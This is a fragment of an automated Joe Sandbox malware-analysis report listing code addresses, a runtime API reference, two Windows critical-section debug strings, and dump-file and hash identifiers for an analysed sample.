                                                    0x0184fdda
                                                    0x0184fde2
                                                    0x0184fde5
                                                    0x0184fdec
                                                    0x0184fdfa
                                                    0x0184fdff
                                                    0x0184fe0a
                                                    0x0184fe0f
                                                    0x0184fe17
                                                    0x0184fe1e
                                                    0x0184fe19
                                                    0x0184fe19
                                                    0x0184fe19
                                                    0x0184fe20
                                                    0x0184fe21
                                                    0x0184fe22
                                                    0x0184fe25
                                                    0x0184fe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184FDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0184FE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0184FE01
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: a980c72ddede3f83bc99f85ece16d71c3fee65704592ae28411907e4cf7f4e94
                                                    • Instruction ID: 361380d4daae757f5f13a934d12f33ac62f3ea2cafcd5c4eac87f473b339d7b1
                                                    • Opcode Fuzzy Hash: a980c72ddede3f83bc99f85ece16d71c3fee65704592ae28411907e4cf7f4e94
                                                    • Instruction Fuzzy Hash: E1F0F672240205BFE6201A49DC06F23BF5AEB84B30F140318F7289A5E1EE62F92086F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%